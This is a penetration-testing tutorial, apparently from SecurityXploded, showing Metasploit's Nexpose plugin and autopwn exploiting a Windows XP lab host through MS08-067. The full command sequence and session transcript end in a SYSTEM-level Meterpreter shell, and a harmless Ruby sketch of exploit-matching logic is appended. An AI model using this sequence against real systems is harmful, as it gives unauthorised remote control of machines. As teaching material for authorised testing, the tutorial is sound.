Nexpose + Metasploit = Shell | www.SecurityXploded.com
 
 
Nexpose + Metasploit = Shell
Author: Manjunath aka Punter 
 
 
 
 
Introduction
 
Today we will see how to drive Nexpose [Reference 2], Rapid7's vulnerability scanner, from inside the Metasploit Framework (MSF) [Reference 1].

Metasploit ships a Nexpose plugin. From msfconsole we log in to Nexpose, scan the target system and import the scan results into the Metasploit database. MSF then looks for exploit modules that match what was found and, with automated exploitation switched on, launches them against the target; if the target is vulnerable we end up with an interactive shell.
 
 
 
Get into action with Nexpose + Metasploit
Let the action begin, with the following steps:
  • Run the Nexpose scanner
  • Start the Metasploit Framework
Here is the sequence of commands typed into Metasploit once it is up:
 
root@bt:/pentest/exploits/framework3# ./msfconsole

msf > db_driver sqlite3

msf > db_create

msf > load nexpose

msf > nexpose_connect punter:netxoseloginpassword@127.0.0.1

msf > nexpose_scan -x 192.168.0.102

msf > sessions -i 1


Check out the transcript of the interactive session below.

root@bt:/pentest/exploits/framework3# ./msfconsole

[Metasploit ASCII-art banner]

=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 636 exploits - 319 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r11120 updated 17 days ago (2010.11.24)

Warning: This copy of the Metasploit Framework was last updated 17 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > db_driver sqlite3
[*] Using database driver sqlite3
msf > db_create
[-]
[-] Warning: The db_create command is deprecated, use db_connect instead.
[-] The database and schema will be created automatically by
[-] db_connect. If db_connect fails to create the database, create
[-] it manually with your DBMS's administration tools.
[-]
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db
msf > load nexpose

[Rapid7 NeXpose plugin ASCII-art banner]

[*] NeXpose integration has been activated
[*] Successfully loaded plugin: nexpose
msf > nexpose_connect punter:netxoseloginpassword@127.0.0.1
[*] Connecting to NeXpose instance at 127.0.0.1:3780 with username punter...
msf > nexpose_scan -x 192.168.0.102
[*] Scanning 1 addresses with template pentest-audit in sets of 32
[*] Completed the scan of 1 addresses
[*] Launching an automated exploitation session
[*] Analysis completed in 26 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*] Matching Exploit Modules
[*] ================================================================================
[*] 192.168.0.102:445 exploit/windows/smb/ms08_067_netapi (...)
[*] 192.168.0.102:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439)
[*] ================================================================================
[*]
[*]
[*] (1/2 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi ...
[*] (2/2 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi ...
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] (2/2 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] Meterpreter session 1 opened (192.168.0.104:18282 -> 192.168.0.102:1067) 
[*] (2/2 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] (2/2 [1 sessions]): Waiting on 0 launched modules to finish execution...
[*] The autopwn command has completed with 1 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================

Active sessions
===============

Id  Type                   Information                            Connection                                 Via
--  ----                   -----------                            ----------                                 ---
1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ TESTBOX-85474D5  192.168.0.104:18282 -> 192.168.0.102:1067  exploit/windows/smb/ms08_067_netapi

[*] ================================================================================

msf > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 1040 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.102
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1

C:\WINDOWS\system32>exit
 
While Metasploit's automated exploitation run is still in progress, you can list any sessions it has already opened with the 'sessions' command as shown above, then switch into the one you want and gather more information. Two things in the transcript are worth noticing. First, the analysis line reports 0 vulns / 0 refs, yet two SMB exploit modules were matched on port 445, so the selection here was driven by the exposed service rather than by a vulnerability the scanner confirmed. Second, autopwn launches every match it finds; a failed attempt such as MS08-067 against a host that is not actually vulnerable can crash the target service, so on a real engagement review the hosts, services and vulns in the database and pick exploits deliberately instead of letting them all fire.
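To make the matching behaviour described in the introduction and seen in the transcript concrete, here is an added example in Ruby (not code from the article, and not Metasploit's own code) that re-implements the two selection rules the old db_autopwn command offered: by vulnerability reference (its -x switch) and by open port (its -p switch). The module catalogue and the hosts are constructed for the example; the CVE and MS references listed for the three modules are the ones the real modules carry. Run against a host with 445/tcp open but nothing imported, the reference rule returns nothing while the port rule returns both SMB modules, which is the shape of the "0 vulns / 0 refs" run above.

```ruby
require 'set'

# Added example, not code from the original article or from Metasploit itself:
# a minimal re-implementation of the two ways the old db_autopwn command picked
# exploit modules for hosts held in the Metasploit database.
#   - by reference (db_autopwn -x): a module is selected when one of its
#     references (CVE-..., MSyy-nnn) matches a vulnerability reference imported
#     from the scanner
#   - by port (db_autopwn -p): a module is selected when the host exposes a
#     service on the module's target port, whether or not any vulnerability
#     was reported for it
# The module catalogue and the hosts below are constructed for this example; the
# CVE/MS references on the three modules are the ones the real modules carry.

EXPLOIT_MODULES = {
  'exploit/windows/smb/ms08_067_netapi'  => { port: 445, refs: %w[CVE-2008-4250 MS08-067] },
  'exploit/windows/smb/ms06_040_netapi'  => { port: 445, refs: %w[CVE-2006-3439 MS06-040] },
  'exploit/windows/dcerpc/ms03_026_dcom' => { port: 135, refs: %w[CVE-2003-0352 MS03-026] },
}.freeze

# A host as it would look after an import: the ports with a service on them and
# the vulnerabilities (each carrying its references) the scanner reported.
Host = Struct.new(:address, :ports, :vulns)

# References are compared case-insensitively; scanners are not consistent about
# "CVE-" versus "cve-".
def normalize_ref(ref)
  ref.to_s.strip.upcase
end

# Reference-based matching: only modules whose references overlap a reported vuln.
# Returns [[address, port, module_name], ...].
def match_by_reference(host, modules = EXPLOIT_MODULES)
  host_refs = host.vulns.flat_map { |v| v[:refs] }.map { |r| normalize_ref(r) }.to_set
  modules.select { |_name, m| m[:refs].any? { |r| host_refs.include?(normalize_ref(r)) } }
         .map { |name, m| [host.address, m[:port], name] }
end

# Port-based matching: every module that targets an open port, vulnerable or not.
# This is what yields matches even when the analysis counted no vulnerabilities.
def match_by_port(host, modules = EXPLOIT_MODULES)
  modules.select { |_name, m| host.ports.include?(m[:port]) }
         .map { |name, m| [host.address, m[:port], name] }
end

# Render matches the way the autopwn transcript lists them ("addr:port module").
def format_matches(matches)
  matches.map { |addr, port, name| "#{addr}:#{port} #{name}" }
end

if __FILE__ == $PROGRAM_NAME
  # Constructed: the host from the article with RPC (135) and SMB (445) exposed
  # and nothing imported yet, then the same host after a scan reported MS08-067.
  unscanned = Host.new('192.168.0.102', [135, 445], [])
  scanned   = Host.new('192.168.0.102', [135, 445], [{ refs: ['cve-2008-4250'] }])

  [['by reference, nothing imported', match_by_reference(unscanned)],
   ['by port, nothing imported', match_by_port(unscanned)],
   ['by reference, MS08-067 reported', match_by_reference(scanned)]].each do |label, matches|
    puts "#{label}:"
    lines = format_matches(matches)
    puts(lines.empty? ? '  (none)' : lines.map { |l| "  #{l}" })
  end
end
```

The point of keeping the two rules separate is that only the reference rule ties an exploit to evidence from the scan; the port rule is a guess about every host that happens to expose the service, which is exactly the situation in which a blindly launched exploit is most likely to crash a patched target.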
 
 
 
References